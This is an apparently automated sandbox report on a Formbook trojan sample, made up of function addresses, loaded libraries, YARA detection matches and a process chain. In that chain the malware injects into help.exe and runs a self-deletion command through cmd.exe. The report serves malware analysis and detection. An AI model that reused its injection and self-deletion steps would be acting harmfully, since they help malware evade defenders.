                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0337EFA04_2_0337EFA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0330CFE04_2_0330CFE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032F2FC84_2_032F2FC8
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BEE264_2_033BEE26
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03300E594_2_03300E59
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03312E904_2_03312E90
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BCE934_2_033BCE93
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BEEDB4_2_033BEEDB
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0339CD1F4_2_0339CD1F
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0330AD004_2_0330AD00
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03318DBF4_2_03318DBF
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032FADE04_2_032FADE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03300C004_2_03300C00
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033A0CB54_2_033A0CB5
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032F0CF24_2_032F0CF2
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B132D4_2_033B132D
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032ED34C4_2_032ED34C
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0334739A4_2_0334739A
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033052A04_2_033052A0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033A12ED4_2_033A12ED
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0331B2C04_2_0331B2C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033CB16B4_2_033CB16B
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032EF1724_2_032EF172
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0333516C4_2_0333516C
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0330B1B04_2_0330B1B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B70E94_2_033B70E9
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BF0E04_2_033BF0E0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033070C04_2_033070C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033AF0CC4_2_033AF0CC
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BF7B04_2_033BF7B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033456304_2_03345630
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B16CC4_2_033B16CC
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B75714_2_033B7571
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0339D5B04_2_0339D5B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BF43F4_2_033BF43F
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032F14604_2_032F1460
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BFB764_2_033BFB76
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0331FB804_2_0331FB80
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03375BF04_2_03375BF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0333DBF94_2_0333DBF9
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03373A6C4_2_03373A6C
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BFA494_2_033BFA49
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B7A464_2_033B7A46
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03345AA04_2_03345AA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0339DAAC4_2_0339DAAC
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033A1AA34_2_033A1AA3
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033ADAC64_2_033ADAC6
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033959104_2_03395910
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033099504_2_03309950
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0331B9504_2_0331B950
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0336D8004_2_0336D800
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033038E04_2_033038E0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BFF094_2_033BFF09
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BFFB14_2_033BFFB1
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03301F924_2_03301F92
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C3FD54_2_032C3FD5
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C3FD24_2_032C3FD2
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03309EB04_2_03309EB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B7D734_2_033B7D73
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033B1D5A4_2_033B1D5A
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03303D404_2_03303D40
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0331FDC04_2_0331FDC0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03379C324_2_03379C32
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_033BFCF24_2_033BFCF2
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294E0F14_2_0294E0F1
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294E59D4_2_0294E59D
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0294EB764_2_0294EB76
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_02932FB04_2_02932FB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_02932D904_2_02932D90
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_02932D894_2_02932D89
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_02939E5B4_2_02939E5B
                Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_02939E604_2_02939E60
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: String function: 01A7F290 appears 105 times
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: String function: 01A35130 appears 58 times
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: String function: 019EB970 appears 280 times
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: String function: 01A47E54 appears 102 times
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: String function: 01A6EA12 appears 86 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 03335130 appears 58 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0336EA12 appears 86 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 03347E54 appears 103 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0337F290 appears 105 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 032EB970 appears 280 times
                Source: duGqHKp0OUXaX1D.exeStatic PE information: invalid certificate
                Source: duGqHKp0OUXaX1D.exe, 00000000.00000002.1373385735.0000000005B70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000000.00000002.1369670156.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000000.00000002.1370280563.00000000026C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWagon.dll> vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000000.00000002.1372677605.0000000004F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWagon.dll> vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.00000000014AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1432136782.0000000001AED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.0000000001498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1433271008.0000000001D44000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exeBinary or memory string: OriginalFilenameuSpw.exeX vs duGqHKp0OUXaX1D.exe
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: wininet.dllJump to behavior
                Source: duGqHKp0OUXaX1D.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: duGqHKp0OUXaX1D.exe PID: 7548, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Process Memory Space: duGqHKp0OUXaX1D.exe PID: 7656, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Process Memory Space: help.exe PID: 7700, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: duGqHKp0OUXaX1D.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, ivtNue3aMakjbVsfus.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, ivtNue3aMakjbVsfus.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, DcAJfbQ7wU7SQxmjqR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IN0CtjOPkLO1DWAhVX.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IN0CtjOPkLO1DWAhVX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IN0CtjOPkLO1DWAhVX.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IN0CtjOPkLO1DWAhVX.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IN0CtjOPkLO1DWAhVX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IN0CtjOPkLO1DWAhVX.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IN0CtjOPkLO1DWAhVX.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IN0CtjOPkLO1DWAhVX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IN0CtjOPkLO1DWAhVX.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, DcAJfbQ7wU7SQxmjqR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, DcAJfbQ7wU7SQxmjqR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.evad.winEXE@144/1@11/8
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\duGqHKp0OUXaX1D.exe.logJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
                Source: duGqHKp0OUXaX1D.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: duGqHKp0OUXaX1D.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: duGqHKp0OUXaX1D.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess created: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess created: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe"Jump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: duGqHKp0OUXaX1D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: duGqHKp0OUXaX1D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: duGqHKp0OUXaX1D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000003.1433591915.000000000310C000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000003.1431937027.0000000002F23000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: duGqHKp0OUXaX1D.exe, duGqHKp0OUXaX1D.exe, 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000003.1433591915.000000000310C000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000003.1431937027.0000000002F23000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: uSpw.pdb source: duGqHKp0OUXaX1D.exe
                Source: Binary string: help.pdbGCTL source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1433271008.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.0000000001498000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3821169791.00000000007C0000.00000040.80000000.00040000.00000000.sdmp
